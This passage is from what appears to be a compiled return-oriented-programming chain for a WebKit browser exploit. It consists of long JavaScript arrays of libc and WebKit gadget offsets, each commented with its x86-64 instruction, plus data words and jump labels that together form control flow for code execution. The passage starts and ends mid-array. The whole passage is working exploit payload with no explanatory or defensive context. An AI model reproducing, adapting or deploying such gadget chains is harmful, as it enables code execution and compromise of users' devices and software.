libc_base+763368 //pop rcx ]); //L10278: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10279: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10280: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+476536, //L10281 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10281: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi 
//L10283: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+476656, //L10286 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+476640, //L10284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10284: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10286: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+476800, //L10289 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+476768, //L10287 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+476784, //L10288 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10287: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10288: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10289: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+476880, //L10290 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10290: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10292: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+477000, //L10295 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+476984, //L10293 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10293: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10295: db([0, 0]); // 0x0 
set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+477144, //L10298 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+477112, //L10296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+477128, //L10297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10296: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10297: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10298: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+477224, //L10299 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10299: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10301: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+477344, //L10304 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+477328, //L10302 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10302: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10304: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+477488, //L10307 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+477456, //L10305 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+477472, //L10306 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10305: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L10306: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10307: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L10309: ropchain+477592, //L10308 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+275424, //__ntoa_long //L10308: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967216, 4294967295]); // -0x50 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+477664, //L10310 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10310: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10312: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+477744, //L10314 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10314: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+488152, //L10313 //L10193: libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10316: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10318: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+477904, //L10321 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+477888, //L10319 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10319: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10321: 
db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+478080, //L10324 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+478096, //L10325 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+478048, //L10322 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+478064, //L10323 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10322: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10323: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10324: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10325: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+478192, //L10327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+478176, //L10326 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10326: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10327: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L10328: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L10329: db([6, 0]); // 0x6 set_gadget(libc_base+763368,); //pop rcx //L10330: db([6, 0]); // 0x6 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl 
libc_base+764760, //pop rsi ropchain+478392, //L10332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10332: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+478448, //L10333 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10333: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+478584, //L10337 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+478568, //L10336 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10335: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L10336: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10337: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+478720, //L10340 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+478752, //L10342 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+478704, //L10339 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10339: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10340: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10341: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10342: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+478864, //L10343+8 libc_base+501454, 
//add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+478856, //L10343 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L10343: db([0, 0]); // 0x0 set_gadgets([ ropchain+478880, //L10343+24 ropchain+480208, //L10338 libc_base+764760, //pop rsi ropchain+478920, //L10344 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10344: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10346: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+479040, //L10349 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+479024, //L10347 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10347: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10349: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+479200, //L10353 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+479152, //L10350 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+479168, //L10351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10350: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10351: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10352: db([8, 0]); // 0x8 set_gadget(libc_base+759608,); //pop rax //L10353: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+479256, //L10354 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10354: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); 
//pop rsi //L10356: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+479376, //L10357 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+479392, //L10359 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10357: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10359: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+479568, //L10362 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+479584, //L10363 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+479536, //L10360 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+479552, //L10361 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10360: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10361: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10362: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10363: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+479744, //L10367 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+479712, //L10365 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+479728, //L10366 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10364: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L10365: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); 
//pop rdi //L10366: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10367: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+479816, //L10369 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10368: db([32, 0]); // 0x20 set_gadget(libc_base+759608,); //pop rax //L10369: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+479888, //L10371 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10370: db([56, 0]); // 0x38 set_gadget(libc_base+759608,); //pop rax //L10371: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+480072, //L10374 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+480088, //L10375 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+480040, //L10372 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+480056, //L10373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10372: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10373: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10374: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10375: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+480184, //L10378 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+480168, //L10377 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10377: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax 
//L10378: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+483648, //L10376 //L10338: libc_base+764760, //pop rsi ropchain+480248, //L10379 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10379: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10381: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+480368, //L10384 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+480352, //L10382 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10382: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10384: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+480544, //L10387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+480560, //L10388 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+480512, //L10385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+480528, //L10386 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10385: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10386: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10387: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10388: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+480656, //L10390 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+480640, //L10389 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi 
]); //L10389: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10390: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L10391: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L10392: db([7, 0]); // 0x7 set_gadget(libc_base+763368,); //pop rcx //L10393: db([7, 0]); // 0x7 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+480856, //L10395 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10395: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+480912, //L10396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10396: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+481048, //L10400 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+481032, //L10399 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10398: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L10399: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10400: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi 
ropchain+481184, //L10403 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+481216, //L10405 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+481168, //L10402 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10402: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10403: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10404: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10405: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+481328, //L10406+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+481320, //L10406 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L10406: db([0, 0]); // 0x0 set_gadgets([ ropchain+481344, //L10406+24 ropchain+482672, //L10401 libc_base+764760, //pop rsi ropchain+481384, //L10407 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10407: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10409: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+481504, //L10412 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+481488, //L10410 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10410: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10412: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+481664, //L10416 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+481616, //L10413 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+481632, //L10414 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10413: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10414: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10415: db([8, 0]); // 0x8 set_gadget(libc_base+759608,); //pop rax //L10416: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+481720, //L10417 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10417: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10419: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+481840, //L10420 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+481856, //L10422 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10420: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10422: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+482032, //L10425 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+482048, //L10426 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+482000, //L10423 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+482016, //L10424 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10423: 
db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10424: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10425: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10426: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+482208, //L10430 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+482176, //L10428 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+482192, //L10429 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10427: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L10428: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10429: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10430: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+482280, //L10432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10431: db([32, 0]); // 0x20 set_gadget(libc_base+759608,); //pop rax //L10432: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+482352, //L10434 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10433: db([48, 0]); // 0x30 set_gadget(libc_base+759608,); //pop rax //L10434: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+482536, //L10437 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+482552, //L10438 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+482504, //L10435 webkit_base+660161, //mov 
